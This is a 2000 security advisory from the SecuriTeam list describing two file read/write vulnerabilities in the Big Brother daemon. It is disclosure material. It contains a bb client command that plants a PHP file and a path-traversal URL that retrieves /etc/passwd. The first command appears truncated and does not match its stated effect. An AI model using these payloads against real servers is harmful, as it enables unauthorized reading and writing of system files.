Subject: [NEWS] Two new Big Brother vulnerabilities
Date: Fri, 14 Jul 2000 21:33:00 +0200
g security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Two new Big Brother vulnerabilities
--------------------------------------------------------------------------------
SUMMARY
The Big Brother daemon listens for incoming connections
on port 1984. Two separate security holes allow remote attackers to read
and write arbitrary files on the system, entirely compromising the
server's security.
DETAILS
Vulnerable systems:
Big Brother 1.4h2 (only writing files)
Big Brother version 1.4h (both vulnerabilities)
Immune systems:
Big Brother version 1.4h2 (immune against reading arbitrary files)
First Vulnerability:
The following command:
$ ./bb 1.2.3.4 "status evil.php3 "
(NOTE: The bb program is the Big Brother client)
Will show the /etc/passwd upon browsing to:
http://1.2.3.4/bb/logs/evil.php3
Second Vulnerability:
The second problem exists in the code where $HOSTSVC does not do
authenticity checking for its assigned variable.
---- snip ----
# get the color of the status from the status file
set `$CAT "$BBLOGS/$HOSTSVC" | $HEAD -1` >/dev/null 2>&1 BKG="$1"
---- snap ----
Example:
The following URL:
http://www.bb4.com/cgi-bin/bb-hostsvc.sh?HOSTSVC=/../../../../../../../../etc/passwd
Will retrieve the /etc/passwd file.
ADDITIONAL INFORMATION
The information has been provided by xternal
and Eric Hines.
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.